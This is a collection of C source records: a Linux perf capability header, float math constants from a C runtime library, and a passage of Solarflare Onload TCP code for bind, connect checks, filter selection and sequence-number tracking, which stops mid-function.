/* SPDX-License-Identifier: GPL-2.0 */ #ifndef __PERF_CAP_H #define __PERF_CAP_H #include <stdbool.h> #include <linux/capability.h> #include <linux/compiler.h> #ifdef HAVE_LIBCAP_SUPPORT #include <sys/capability.h> bool perf_cap__capable(cap_value_t cap); #else #include <unistd.h> #include <sys/types.h> static inline bool perf_cap__capable(int cap __maybe_unused) { return geteuid() == 0; } #endif /* HAVE_LIBCAP_SUPPORT */ /* For older systems */ #ifndef CAP_SYSLOG #define CAP_SYSLOG 34 #endif #ifndef CAP_PERFMON #define CAP_PERFMON 38 #endif #endif /* __PERF_CAP_H */
{ "language": "C" }
// values used by math functions -- IEEE 754 float version #if defined(_M_CEE_PURE) #if defined(MRTDLL) #undef MRTDLL #endif #if defined(MRTDLL) #undef CRTDLL #endif #endif #include "xmath.h" // macros #define NBITS (16 + _FOFF) #if _D0 == 0 #define INIT(w0) \ { w0, 0 } #define INIT2(w0, w1) \ { w0, w1 } #else // _D0 == 0 #define INIT(w0) \ { 0, w0 } #define INIT2(w0, w1) \ { w1, w0 } #endif // _D0 == 0 _EXTERN_C_UNLESS_PURE // static data extern /* const */ _Dconst _FDenorm = {INIT2(0, 1)}; extern /* const */ _Dconst _FEps = {INIT((_FBIAS - NBITS - 1) << _FOFF)}; extern /* const */ _Dconst _FInf = {INIT(_FMAX << _FOFF)}; extern /* const */ _Dconst _FNan = {INIT((_FMAX << _FOFF) | (1 << (_FOFF - 1)))}; extern /* const */ _Dconst _FSnan = {INIT2(_FMAX << _FOFF, 1)}; extern /* const */ _Dconst _FRteps = {INIT((_FBIAS - NBITS / 2) << _FOFF)}; extern /* const */ float _FXbig = (NBITS + 1) * 347L / 1000; extern /* const */ float _FZero = 0.0F; _END_EXTERN_C_UNLESS_PURE /* * Copyright (c) by P.J. Plauger. All rights reserved. * Consult your license regarding permissions and restrictions. V6.50:0009 */
{ "language": "C" }
/* SPDX-License-Identifier: GPL-2.0 */ /* X-SPDX-Copyright-Text: (c) Solarflare Communications Inc */ /**************************************************************************\ *//*! \file ** <L5_PRIVATE L5_SOURCE> ** \author djr/ctk ** \brief TCP connection routines: ** accept, bind, close, connect, shutdown, getpeername ** \date 2003/06/03 ** \cop (c) Level 5 Networks Limited. ** </L5_PRIVATE> *//* \**************************************************************************/ /*! \cidoxg_lib_transport_ip */ #include "ip_internal.h" #include <onload/common.h> #include <onload/sleep.h> #ifdef ONLOAD_OFE #include "ofe/onload.h" #endif #ifndef __KERNEL__ #include <ci/internal/efabcfg.h> #endif #define VERB(x) #define LPF "tcp_connect: " #ifndef __KERNEL__ /*! * Tests for valid sockaddr & sockaddr length & AF_INET or AF_INET6. */ static int ci_tcp_validate_sa( sa_family_t domain, const struct sockaddr* sa, socklen_t sa_len ) { /* * Linux deviates from documented behaviour here; * On Linux we return EINVAL if sa and sa_len are NULL and 0 respectively, * and we return EFAULT if sa is NULL and sa_len != 0.... */ if( !sa ) { LOG_U(ci_log(LPF "invalid sockaddr : sa = %lx, sa_len = %d", (long) sa, sa_len)); if( sa_len == 0 ) RET_WITH_ERRNO( EINVAL ); else RET_WITH_ERRNO( EFAULT ); } if( sa_len < sizeof(struct sockaddr_in) #if CI_CFG_FAKE_IPV6 || (domain == AF_INET6 && sa_len < SIN6_LEN_RFC2133) #endif ) { LOG_U( ci_log(LPF "struct too short to be sockaddr_in(6)" )); RET_WITH_ERRNO( EINVAL ); } /* It should be sa->sa_family, but MS wdm does not understand it, * so let's use CI_SIN(sa)->sin_family. */ if (CI_SIN(sa)->sin_family != domain && CI_SIN(sa)->sin_family != AF_UNSPEC) { LOG_U(ci_log(LPF "address family %d does not match " "with socket domain %d", CI_SIN(sa)->sin_family, domain)); RET_WITH_ERRNO(EAFNOSUPPORT); } #if CI_CFG_FAKE_IPV6 && !CI_CFG_IPV6 if (sa->sa_family == AF_INET6 && !ci_tcp_ipv6_is_ipv4(sa)) { LOG_TC(ci_log(LPF "Pure IPv6 address is not supported")); RET_WITH_ERRNO(EAFNOSUPPORT); } #endif return 0; } #endif /* The flags and state associated with bind are complex. This function * provides a basic consistency check on the enabled flags. */ ci_inline void ci_tcp_bind_flags_assert_valid(ci_sock_cmn* s) { if( s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND ) { /* If we deferred the bind we need to know that we should bind later */ ci_assert( s->s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND ); /* We can only defer bind in cases where the application doesn't bind to * a specific port. */ ci_assert( s->s_flags & ~CI_SOCK_FLAG_PORT_BOUND ); } } /* Bind a TCP socket, performing an OS socket bind if necessary. * \param ni Stack * \param s Socket to be bound * \param fd File descriptor (unused in kernel) * \param ci_addr_t Local address to which to bind * \param port_be16 [in] requested port [out] assigned port * \param may_defer Whether OS socket bind can be deferred * \return 0 - success & [port_be16] updated * CI_SOCKET_HANDOVER, Pass to OS, OS bound ok, (no error) * CI_SOCKET_ERROR & errno set */ int __ci_tcp_bind(ci_netif *ni, ci_sock_cmn *s, ci_fd_t fd, ci_addr_t addr, ci_uint16* port_be16, int may_defer) { int rc = 0; ci_uint16 user_port; /* Port number specified by user, not by OS. * See bug 4015 for details */ union ci_sockaddr_u sa_u; ci_assert(s->domain == AF_INET || s->domain == AF_INET6); ci_assert( port_be16 ); ci_assert(s->b.state & CI_TCP_STATE_TCP || s->b.state == CI_TCP_STATE_ACTIVE_WILD); ci_tcp_bind_flags_assert_valid(s); user_port = *port_be16; if( !(s->s_flags & CI_SOCK_FLAG_TPROXY) ) { /* In active-wild mode we might not want to bind yet. */ if( !may_defer || !NI_OPTS(ni).tcp_shared_local_ports || user_port != 0 ) { #if CI_CFG_FAKE_IPV6 ci_assert(s->domain == AF_INET || s->domain == AF_INET6); if( s->domain == AF_INET ) ci_make_sockaddr_from_ip4(&sa_u.sin, user_port, addr.ip4); else if( !CI_IS_ADDR_IP6(addr) ) ci_make_sockaddr_in6_from_ip4(&sa_u.sin6, user_port, addr.ip4); #if CI_CFG_IPV6 else { ci_make_sockaddr_in6_from_ip6(&sa_u.sin6, user_port, (ci_uint32*)addr.ip6); /* Bind to link-local address requires an interface */ sa_u.sin6.sin6_scope_id = s->cp.so_bindtodevice; } #endif #else ci_assert(s->domain == AF_INET); ci_make_sockaddr_from_ip4(&sa_u.sin, user_port, addr.ip4); #endif #ifdef __ci_driver__ rc = efab_tcp_helper_bind_os_sock_kernel(netif2tcp_helper_resource(ni), SC_SP(s), &sa_u.sa, sizeof(sa_u), port_be16); #else rc = ci_tcp_helper_bind_os_sock(fd, &sa_u.sa, sizeof(sa_u), port_be16); #endif if( rc == 0 ) s->s_flags &= ~(CI_SOCK_FLAG_CONNECT_MUST_BIND | CI_SOCK_FLAG_DEFERRED_BIND); } /* We can defer this bind. We need to make an extra check for the socket * already having been bound. In the non-deferred case this is enforced by * the binding of the OS socket, but we don't have that luxury here. */ else if( s->s_flags & CI_SOCK_FLAG_DEFERRED_BIND || ! (s->s_flags & CI_SOCK_FLAG_CONNECT_MUST_BIND) ) { /* Already bound. */ CI_SET_ERROR(rc, EINVAL); } else { /* CI_SOCK_FLAG_DEFERRED_BIND is clear, so either we never set it * (meaning nobody called bind()) or we've since cleared it (meaning that * the deferred bind has been performed). Only in the former case are we * allowed to bind now, but the latter case should have been checked by * the caller. */ ci_tcp_state* c = &SOCK_TO_WAITABLE_OBJ(s)->tcp; ci_assert_equal(s->b.state, CI_TCP_CLOSED); ci_assert(~c->tcpflags & CI_TCPT_FLAG_WAS_ESTAB); (void) c; s->s_flags |= CI_SOCK_FLAG_DEFERRED_BIND; rc = 0; } } else { /* CI_SOCK_FLAG_TPROXY is set. We don't use OS backing sockets for these, * and we don't support deferred binds either. */ ci_assert_nflags(s->s_flags, CI_SOCK_FLAG_DEFERRED_BIND); s->s_flags &= ~CI_SOCK_FLAG_CONNECT_MUST_BIND; } /* bug1781: only do this if the earlier bind succeeded. * check if we can handle this socket */ if( rc != 0 ) return rc; if( user_port != 0 ) s->s_flags |= CI_SOCK_FLAG_PORT_BOUND; if( !CI_IPX_ADDR_IS_ANY(addr) ) s->cp.sock_cp_flags |= OO_SCP_BOUND_ADDR; #ifndef __ci_driver__ /* We do not call bind() to alien address from in-kernel code */ if( ! (s->s_flags & CI_SOCK_FLAG_TPROXY) && !CI_IPX_ADDR_IS_ANY(addr) && ! cicp_user_addr_is_local_efab(ni, addr) ) s->s_flags |= CI_SOCK_FLAG_BOUND_ALIEN; #endif ci_tcp_bind_flags_assert_valid(s); return rc; } static int /*bool*/ ci_tcp_connect_check_local_dst_addr(ci_tcp_socket_listen* tls, ci_addr_t dst_addr) { if( !CI_IPX_ADDR_IS_ANY(tls->s.laddr) ) return CI_IPX_ADDR_EQ(tls->s.laddr, dst_addr); #if CI_CFG_IPV6 else { if( CI_IS_ADDR_IP6(dst_addr) ) return CI_IS_ADDR_IP6(tls->s.laddr); else return !(tls->s.s_flags & CI_SOCK_FLAG_V6ONLY); } #endif return 1; } oo_sp ci_tcp_connect_find_local_peer(ci_netif *ni, int locked, ci_addr_t dst_addr, int dport_be16) { ci_tcp_socket_listen* tls; int i; oo_sp sock = OO_SP_NULL; if( locked ) { /* SW filter table look-up does not find socket in scenarios where client * attempts to connect with non-SF IP address to INADDR_ANY bound listening * socket */ /* FIXME: make ci_netif_listener_lookup() work for unlocked stacks */ /* FIXME: enable IPv6, bug 84048 */ sock = ci_netif_listener_lookup(ni, CI_IS_ADDR_IP6(dst_addr) ? AF_SPACE_FLAG_IP6 : AF_SPACE_FLAG_IP4, dst_addr, dport_be16); } if( OO_SP_NOT_NULL(sock) ) { tls = ID_TO_TCP_LISTEN(ni, sock); if( ( ~tls->s.b.sb_aflags & CI_SB_AFLAG_ORPHAN ) && ( tls->s.cp.so_bindtodevice == CI_IFID_BAD ) ) goto found; } /* Socket has not been found through SW filter table look-up. * Perform full search to cover the case when destination address * does not belong to SF interface. */ for( i = 0; i < (int)ni->state->n_ep_bufs; ++i ) { citp_waitable_obj* wo = ID_TO_WAITABLE_OBJ(ni, i); if( wo->waitable.state != CI_TCP_LISTEN ) continue; if( wo->waitable.sb_aflags & CI_SB_AFLAG_ORPHAN ) continue; tls = SOCK_TO_TCP_LISTEN(&wo->sock); if( tls->s.cp.lport_be16 != dport_be16 ) continue; if( !ci_tcp_connect_check_local_dst_addr(tls, dst_addr) ) continue; if( tls->s.cp.so_bindtodevice != CI_IFID_BAD ) continue; goto found; } return OO_SP_NULL; found: /* this is our tls - connect to it! */ if( (int)ci_tcp_acceptq_n(tls) < tls->acceptq_max ) return tls->s.b.bufid; else return OO_SP_INVALID; } #if CI_CFG_IPV6 static void ci_tcp_init_ipcache_ip4_hdr(ci_tcp_state* ts) { ci_init_ipcache_ip4_hdr(&ts->s); memmove(&ts->s.pkt.ipx.ip4 + 1, &ts->s.pkt.ipx.ip6 + 1, sizeof(ci_tcp_hdr)); ts->outgoing_hdrs_len -= CI_IPX_HDR_SIZE(AF_INET6) - CI_IPX_HDR_SIZE(AF_INET); if( CI_IS_ADDR_IP6(ts->s.cp.laddr) ) { ci_assert(CI_IPX_ADDR_IS_ANY(ts->s.cp.laddr)); ts->s.cp.laddr = ip4_addr_any; } } static void ci_tcp_init_ipcache_ip6_hdr(ci_tcp_state* ts) { memmove(&ts->s.pkt.ipx.ip6 + 1, &ts->s.pkt.ipx.ip4 + 1, sizeof(ci_tcp_hdr)); ci_init_ipcache_ip6_hdr(&ts->s); ts->outgoing_hdrs_len += CI_IPX_HDR_SIZE(AF_INET6) - CI_IPX_HDR_SIZE(AF_INET); if( ! CI_IS_ADDR_IP6(ts->s.cp.laddr) ) { ci_assert(CI_IPX_ADDR_IS_ANY(ts->s.cp.laddr)); ts->s.cp.laddr = addr_any; } } /* * Convert ipcache from IPv4 to IPv6 and backwards. We always start with IPv4, * but in result of socket reuse (listen+shutdown, failed connect, * etc) we * can get a socket in any state. */ void ci_tcp_ipcache_convert(int af, ci_tcp_state* ts) { if( IS_AF_INET6(af) ) { if( !ipcache_is_ipv6(&ts->s.pkt) ) ci_tcp_init_ipcache_ip6_hdr(ts); } else if( ipcache_is_ipv6(&ts->s.pkt) ) { ci_tcp_init_ipcache_ip4_hdr(ts); } } #endif #ifndef __KERNEL__ /* check that we can handle this destination */ static int ci_tcp_connect_check_dest(citp_socket* ep, ci_addr_t dst, int dport_be16) { ci_ip_cached_hdrs* ipcache = &ep->s->pkt; ci_addr_t src = sock_ipx_laddr(ep->s); #if CI_CFG_IPV6 /* * Socket was bound to IPv4 and connecting to IPv6 or vice versa - hand it over. */ if( (ep->s->cp.sock_cp_flags & OO_SCP_BOUND_ADDR) && CI_ADDR_AF(dst) != CI_ADDR_AF(ep->s->laddr) ) { CITP_STATS_NETIF(++ep->netif->state->stats.tcp_connect_af_mismatch); return CI_SOCKET_HANDOVER; } /* IPV6_V6ONLY prevents from connecting to IPv4 address */ if( CI_ADDR_AF(dst) == AF_INET && (ep->s->s_flags & CI_SOCK_FLAG_V6ONLY) ) { CITP_STATS_NETIF(++ep->netif->state->stats.tcp_connect_af_mismatch); return CI_SOCKET_HANDOVER; } ci_tcp_ipcache_convert(CI_ADDR_AF(dst), SOCK_TO_TCP(ep->s)); #endif ci_sock_set_raddr_port(ep->s, dst, dport_be16); ci_ip_cache_invalidate(ipcache); cicp_user_retrieve(ep->netif, ipcache, &ep->s->cp); /* Control plane has selected a source address for us -- remember it. */ if( ipcache->status != retrrc_noroute && ipcache->status != retrrc_alienroute && CI_IPX_ADDR_IS_ANY(src) ) { ci_sock_set_laddr(ep->s, ipcache_laddr(ipcache)); ep->s->cp.laddr = ep->s->laddr; } if(CI_LIKELY( ipcache->status == retrrc_success || ipcache->status == retrrc_nomac || ipcache->status < 0 )) { /* Onloadable. */ if( ipcache->encap.type & CICP_LLAP_TYPE_XMIT_HASH_LAYER4 ) /* We don't yet have a local port number, so the result of that * lookup may be wrong. */ ci_ip_cache_invalidate(ipcache); return 0; } else if( ipcache->status == retrrc_localroute ) { ci_tcp_state* ts = SOCK_TO_TCP(ep->s); if( NI_OPTS(ep->netif).tcp_client_loopback == CITP_TCP_LOOPBACK_OFF) return CI_SOCKET_HANDOVER; ep->s->s_flags |= CI_SOCK_FLAG_BOUND_ALIEN; if( NI_OPTS(ep->netif).tcp_server_loopback != CITP_TCP_LOOPBACK_OFF ) ts->local_peer = ci_tcp_connect_find_local_peer(ep->netif, 1 /* locked */, dst, dport_be16); else ts->local_peer = OO_SP_NULL; if( OO_SP_NOT_NULL(ts->local_peer) || NI_OPTS(ep->netif).tcp_client_loopback != CITP_TCP_LOOPBACK_SAMESTACK ) { ipcache->flags |= CI_IP_CACHE_IS_LOCALROUTE; ipcache->ether_offset = 4; /* lo is non-VLAN */ ipcache->dport_be16 = dport_be16; return 0; } return CI_SOCKET_HANDOVER; } return CI_SOCKET_HANDOVER; } #endif static int/*bool*/ cicp_check_ipif_ifindex(struct oo_cplane_handle* cp, ci_ifid_t ifindex, void* data) { return ifindex == *(ci_ifid_t*)data; } int ci_tcp_use_mac_filter_listen(ci_netif* ni, ci_sock_cmn* s, ci_ifid_t ifindex) { int mode; if( NI_OPTS(ni).scalable_filter_enable == CITP_SCALABLE_FILTERS_DISABLE ) return 0; mode = NI_OPTS(ni).scalable_filter_mode; if( (mode & CITP_SCALABLE_MODE_PASSIVE) == 0 ) return 0; /* Listening sockets bound to an IP address on an interface that we have * a MAC filter for share that MAC filter. Clustering setting of listening * socket needs to match scalable mode rss-wise. */ if( ((NI_OPTS(ni).cluster_ignore == 1 ) || ! (s->s_flags & CI_SOCK_FLAG_REUSEPORT)) == !(mode & CITP_SCALABLE_MODE_RSS) ) { /* If we've been configured to use scalable filters on all interfaces, then * we can do so without further ado. */ if( NI_OPTS(ni).scalable_filter_ifindex_passive == CITP_SCALABLE_FILTERS_ALL ) return 1; /* based on bind to device we might be using scalable iface */ if( ifindex <= 0 ) { /* Determine which ifindex the IP address being bound to is on. */ ifindex = NI_OPTS(ni).scalable_filter_ifindex_passive; return cicp_find_ifindex_by_ip(ni->cplane, sock_laddr(s), cicp_check_ipif_ifindex, &ifindex); } return (NI_OPTS(ni).scalable_filter_ifindex_passive == ifindex); } return 0; } int ci_tcp_use_mac_filter(ci_netif* ni, ci_sock_cmn* s, ci_ifid_t ifindex, oo_sp from_tcp_id) { int use_mac_filter = 0; int mode; if( NI_OPTS(ni).scalable_filter_enable != CITP_SCALABLE_FILTERS_ENABLE ) return 0; mode = NI_OPTS(ni).scalable_filter_mode; if( mode & (CITP_SCALABLE_MODE_TPROXY_ACTIVE | CITP_SCALABLE_MODE_ACTIVE) ) { /* TPROXY sockets don't get associated with a hw filter, so don't need * oof management. */ use_mac_filter |= (s->s_flags & CI_SOCK_FLAGS_SCALABLE); } if( ! use_mac_filter && (mode & CITP_SCALABLE_MODE_PASSIVE) ) { /* Passively opened sockets accepted from a listener using a MAC filter * also use the MAC filter. */ use_mac_filter |= OO_SP_NOT_NULL(from_tcp_id) && (SP_TO_SOCK(ni, from_tcp_id)->s_flags & CI_SOCK_FLAG_STACK_FILTER); if( (use_mac_filter == 0) && (s->b.state == CI_TCP_LISTEN) && ci_tcp_use_mac_filter_listen(ni, s, ifindex) ) use_mac_filter = 1; } if( use_mac_filter ) { /* Only TCP sockets support use of MAC filters at the moment */ ci_assert_flags(s->b.state, CI_TCP_STATE_TCP); } return use_mac_filter; } #ifndef __KERNEL__ int ci_tcp_can_set_filter_in_ul(ci_netif *ni, ci_sock_cmn* s) { if( (s->s_flags & CI_SOCK_FLAGS_SCALABLE) == 0 ) return 0; if( s->b.state == CI_TCP_LISTEN ) return 0; if( (s->s_flags & CI_SOCK_FLAG_REUSEPORT) != 0 ) return 0; if( (s->s_flags & CI_SOCK_FLAG_SCALPASSIVE) != 0 && NI_OPTS(ni).scalable_listen != CITP_SCALABLE_LISTEN_ACCELERATED_ONLY ) return 0; ci_assert_nflags(s->s_flags, CI_SOCK_FLAG_FILTER); ci_assert_flags(s->b.state, CI_TCP_STATE_TCP); ci_assert_nequal(s->b.state, CI_TCP_LISTEN); ci_assert(!CI_IPX_ADDR_IS_ANY(sock_ipx_laddr(s))); ci_assert_nequal(sock_lport_be16(s), 0); return 1; } #endif int ci_tcp_sock_set_stack_filter(ci_netif *ni, ci_sock_cmn* s) { int rc; oo_sp sock; LOG_TC(log( NSS_FMT " %s", NSS_PRI_ARGS(ni, s), __FUNCTION__)); ci_assert((s->s_flags & CI_SOCK_FLAG_STACK_FILTER) == 0); sock = ci_netif_filter_lookup(ni, sock_af_space(s), sock_ipx_laddr(s), sock_lport_be16(s), sock_ipx_raddr(s), sock_rport_be16(s), sock_protocol(s)); if( OO_SP_NOT_NULL(sock) ) return -EADDRINUSE; rc = ci_netif_filter_insert(ni, SC_ID(s), sock_af_space(s), sock_ipx_laddr(s), sock_lport_be16(s), sock_ipx_raddr(s), sock_rport_be16(s), sock_protocol(s)); if( rc == 0 ) { s->s_flags |= CI_SOCK_FLAG_STACK_FILTER; if( (s->s_flags & CI_SOCK_FLAGS_SCALABLE) != 0 ) CITP_STATS_NETIF_INC(ni, mac_filter_shares); } return rc; } void ci_tcp_sock_clear_stack_filter(ci_netif *ni, ci_tcp_state* ts) { LOG_TC(log( LNT_FMT " %s", LNT_PRI_ARGS(ni, ts), __FUNCTION__)); ci_assert((ts->s.s_flags & CI_SOCK_FLAG_STACK_FILTER) != 0); ci_netif_filter_remove(ni, S_ID(ts), sock_af_space(&ts->s), tcp_ipx_laddr(ts), tcp_lport_be16(ts), tcp_ipx_raddr(ts), tcp_rport_be16(ts), tcp_protocol(ts)); ts->s.s_flags &= ~CI_SOCK_FLAG_STACK_FILTER; } /* Returns true if [a] is older than (i.e. was last used before) [b]. */ ci_inline int /*bool*/ ci_tcp_prev_seq_older(const ci_tcp_prev_seq_t* a, const ci_tcp_prev_seq_t* b) { return ci_ip_time_before(a->expiry, b->expiry); } ci_inline ci_uint32 ci_tcp_prev_seq_initial_seqno(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq) { return ci_tcp_initial_seqno(ni, prev_seq->laddr, prev_seq->lport, prev_seq->raddr, prev_seq->rport); } ci_inline ci_uint32 ci_tcp_prev_seq_future_isn(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq, ci_iptime_t ticks) { return ci_tcp_future_isn(ni, prev_seq->laddr, prev_seq->lport, prev_seq->raddr, prev_seq->rport, ticks); } ci_inline ci_uint32 ci_tcp_prev_seq_hash1(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq) { return onload_hash1(ni->state->seq_table_entries_n - 1, prev_seq->laddr, prev_seq->lport, prev_seq->raddr, prev_seq->rport, IPPROTO_TCP); } ci_inline ci_uint32 ci_tcp_prev_seq_hash2(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq) { return onload_hash2(prev_seq->laddr, prev_seq->lport, prev_seq->raddr, prev_seq->rport, IPPROTO_TCP); } /* Given [prev_seq], which records the last sequence number used by a * four-tuple, return whether it would be safe to use the clock-based ISN for * a reuse of that four-tuple at all times from now until the peer is * guaranteed to have exited TIME_WAIT. */ ci_inline int /*bool*/ ci_tcp_clock_isn_safe(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq) { ci_uint32 isn_now = ci_tcp_prev_seq_initial_seqno(ni, prev_seq); ci_uint32 prev_seq_no = prev_seq->seq_no; /* We assume that all peers have 2 MSL <= 240 s. The argument to this * function is in ticks, but a tick is between one and two milliseconds. */ ci_uint32 isn_after_2msl = ci_tcp_prev_seq_future_isn (ni, prev_seq, NI_CONF(ni).tconst_peer2msl_time); return SEQ_GT(isn_now, prev_seq_no) && SEQ_GT(isn_after_2msl, prev_seq_no); } ci_inline void ci_tcp_prev_seq_from_ts(ci_netif* ni, const ci_tcp_state* ts, ci_tcp_prev_seq_t* prev_seq /* out */) { prev_seq->laddr = tcp_ipx_laddr(ts); prev_seq->raddr = tcp_ipx_raddr(ts); prev_seq->lport = tcp_lport_be16(ts); prev_seq->rport = tcp_rport_be16(ts); prev_seq->seq_no = tcp_enq_nxt(ts) + NI_OPTS(ni).tcp_isn_offset; if( prev_seq->seq_no == 0 ) prev_seq->seq_no = 1; } /* Insert [prev_seq_from] (copy 4-tuple and seq_no) * into the table at location [prev_seq]. */ ci_inline void ci_tcp_prev_seq_remember_at(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq_from, ci_tcp_prev_seq_t* prev_seq) { ci_uint32 isn_now; prev_seq->laddr = prev_seq_from->laddr; prev_seq->raddr = prev_seq_from->raddr; prev_seq->lport = prev_seq_from->lport; prev_seq->rport = prev_seq_from->rport; prev_seq->seq_no = prev_seq_from->seq_no; prev_seq->expiry = ci_tcp_time_now(ni) + NI_CONF(ni).tconst_peer2msl_time; /* In many cases clock based ISN catches with entry's seq_no sooner * then nominal expiry time. Once this happen clock based ISN would be * good to use and the entry will no longer be needed */ /* \/ now \/ after_2msl(=4mins) isnclock <------------------------9minutes-----------------------> /\ after_2msl-0x80000000 /\ now-0x80000000 possible seq_no locations, where Xs mark the no-go areas: XXXX| XXXXXXXXXXXXXXXXXXXXXXXX good: new connection created at any time between 'now' and after_2msl will be in the future X| XXXXXXXXXXXXXXXXXXXXXXXXXXX bad: peer might still be in time_wait after the wrap point, cannot expire before after_2msl XXXXXXXXXXXXX XXXXXXXXXXXXXX| bad: mustn't expire until isnclock catches up to here (i.e. in about 30 seconds) XXXXXXXXXXXXXXXXXXXXXXXXXXXX| bad: similar to previous case, but can expire at after_2msl XXXXXXXXXXXXXXXXXXXXXXXXXXXX| bad: same as case 2 */ isn_now = ci_tcp_initial_seqno(ni, prev_seq->laddr, prev_seq->lport, prev_seq->raddr, prev_seq->rport); if( SEQ_GT(prev_seq->seq_no, isn_now) ) { ci_uint32 isn_after_2msl = ci_tcp_future_isn (ni, prev_seq->laddr, prev_seq->lport, prev_seq->raddr, prev_seq->rport, NI_CONF(ni).tconst_peer2msl_time); if( SEQ_GT(isn_after_2msl, prev_seq->seq_no) ) { /* The clock based ISN will catch up with entry between 0 and 2msl. * Let's calculate exactly how much earlier this will happen * and adjust expiry time accordingly */ ci_iptime_t expiry_reduce = ci_tcp_isn2tick (ni, isn_after_2msl - prev_seq->seq_no); ci_assert_ge(NI_CONF(ni).tconst_peer2msl_time, expiry_reduce); prev_seq->expiry -= expiry_reduce; ni->state->stats.tcp_seq_table_short_expiry++; } } ni->state->stats.tcp_seq_table_insertions++; } #define TCP_PREV_SEQ_DEPTH_LIMIT 16 /* Function removes route_count indexes along the look-up path. * [prev_seq_val] is used to generate hashes, * [prev_seq_entry] is pointer to the hash table entry, we'd got match with * [prev_seq_val] 4 tuple. */ static void __ci_tcp_prev_seq_free(ci_netif* ni, const ci_tcp_prev_seq_t* prev_seq_val, const ci_tcp_prev_seq_t* prev_seq_entry) { unsigned hash; unsigned hash2 = 0; int depth = 0; hash = ci_tcp_prev_seq_hash1(ni, prev_seq_val); do { ci_tcp_prev_seq_t* prev_seq = &ni->seq_table[hash]; ci_assert_lt(hash, ni->state->seq_table_entries_n); ci_assert_gt(prev_seq->route_count, 0); --prev_seq->route_count; if( prev_seq == prev_seq_entry ) return; if( hash2 == 0 ) hash2 = ci_tcp_prev_seq_hash2(ni, prev_seq_val); hash = (hash + hash2) & (ni->state->seq_table_entries_n - 1); depth++; ci_assert_le(depth, TCP_PREV_SEQ_DEPTH_LIMIT); if(CI_UNLIKELY( depth > TCP_PREV_SEQ_DEPTH_LIMIT )) { LOG_U(ci_log("%s: reached search depth", __FUNCTION__)); break; } } while( 1 ); } static void ci_tcp_prev_seq_free(ci_netif* ni, ci_tcp_prev_seq_t* prev_seq) { __ci_tcp_prev_seq_free(ni, prev_seq, prev_seq); prev_seq->laddr = addr_any; } /* Add the final sequence number of [ts] to a hash table so that, when reusing * the four-tuple, we can avoid using sequence numbers that overlap with the * old connection. Some peers are more tolerant than others of such apparent * overlap -- Linux, for example, will consider TCP timestamps -- but we have * to target the lowest common denominator, as it were, meaning that we can't * avoid tracking the sequence number in such cases. */ static int /*bool*/ __ci_tcp_prev_seq_remember(ci_netif* ni, const ci_tcp_prev_seq_t* ts_prev_seq) { unsigned hash; unsigned hash2 = 0; /* Oldest amongst the entries that we've traversed. */ ci_tcp_prev_seq_t* oldest_seq = NULL; ci_tcp_prev_seq_t* prev_seq; int depth; /* If the clock ISN is safe, no need to remember the sequence number. */ if( ci_tcp_clock_isn_safe(ni, ts_prev_seq) ) { ni->state->stats.tcp_seq_table_avoided++; return 0; } hash = ci_tcp_prev_seq_hash1(ni, ts_prev_seq); for( depth = 0; depth < TCP_PREV_SEQ_DEPTH_LIMIT; ++depth ) { prev_seq = &ni->seq_table[hash]; ci_assert_lt(hash, ni->state->seq_table_entries_n); ci_assert_impl(CI_TCP_PREV_SEQ_IS_TERMINAL(*prev_seq), CI_TCP_PREV_SEQ_IS_FREE(*prev_seq)); ++prev_seq->route_count; ni->state->stats.tcp_seq_table_steps++; if( CI_TCP_PREV_SEQ_IS_FREE(*prev_seq) ) { /* Free entry. Use it. */ ci_tcp_prev_seq_remember_at(ni, ts_prev_seq, prev_seq); break; } else if( ci_ip_time_before(prev_seq->expiry, ci_ip_time_now(ni)) ) { /* Expired entry. Free it and reuse it. */ ci_tcp_prev_seq_free(ni, prev_seq); ci_tcp_prev_seq_remember_at(ni, ts_prev_seq, prev_seq); ni->state->stats.tcp_seq_table_expiries++; break; } else if( depth == 0 || ci_tcp_prev_seq_older(prev_seq, oldest_seq) ) { /* Entry is live and in use, and the oldest that we've seen so far. * Remember it so that we can purge the oldest if we don't find any free * or expired entries. */ oldest_seq = prev_seq; } if( hash2 == 0 ) hash2 = ci_tcp_prev_seq_hash2(ni, ts_prev_seq); hash = (hash + hash2) & (ni->state->seq_table_entries_n - 1); } /* If we didn't find any free entries, use the oldest up to the search * depth. */ if( depth >= TCP_PREV_SEQ_DEPTH_LIMIT ) { ci_assert_equal(depth, TCP_PREV_SEQ_DEPTH_LIMIT); ci_assert(oldest_seq); /* rollback all route count updates we made above */ __ci_tcp_prev_seq_free(ni, ts_prev_seq, prev_seq); /* purge the oldest entry */ ci_tcp_prev_seq_free(ni, oldest_seq); ni->state->stats.tcp_seq_table_purgations++; /* redo insertion, now it will succeed with free entry */ __ci_tcp_prev_seq_remember(ni, ts_prev_seq); } return 1; } static ci_tcp_prev_seq_t* __ci_tcp_prev_seq_lookup(ci_netif* ni, const ci_tcp_prev_seq_t* ts_prev_seq) { unsigned hash = ci_tcp_prev_seq_hash1(ni, ts_prev_seq); unsigned hash2 = 0; int depth; for( depth = 0; depth < TCP_PREV_SEQ_DEPTH_LIMIT; ++depth ) { ci_tcp_prev_seq_t* prev_seq = &ni->seq_table[hash]; ci_assert_lt(hash, ni->state->seq_table_entries_n); if( CI_TCP_PREV_SEQ_IS_TERMINAL(*prev_seq) ) { return NULL; } if( CI_IPX_ADDR_EQ(prev_seq->laddr, ts_prev_seq->laddr) && prev_seq->lport == ts_prev_seq->lport && CI_IPX_ADDR_EQ(prev_seq->raddr, ts_prev_seq->raddr) && prev_seq->rport == ts_prev_seq->rport ) return prev_seq; if( hash2 == 0 ) hash2 = ci_tcp_prev_seq_hash2(ni, ts_prev_seq); hash = (hash + hash2) & (ni->state->seq_table_entries_n - 1); } return NULL; } ci_uint32 ci_tcp_prev_seq_lookup(ci_netif* ni, const ci_tcp_state* ts) { ci_tcp_prev_seq_t ts_prev_seq; ci_tcp_prev_seq_t* prev_seq; ci_uint32 seq_no; ci_tcp_prev_seq_from_ts(ni, ts, &ts_prev_seq); prev_seq = __ci_tcp_prev_seq_lookup(ni, &ts_prev_seq); if( prev_seq == NULL ) return 0; seq_no = prev_seq->seq_no; ci_tcp_prev_seq_free(ni, prev_seq); 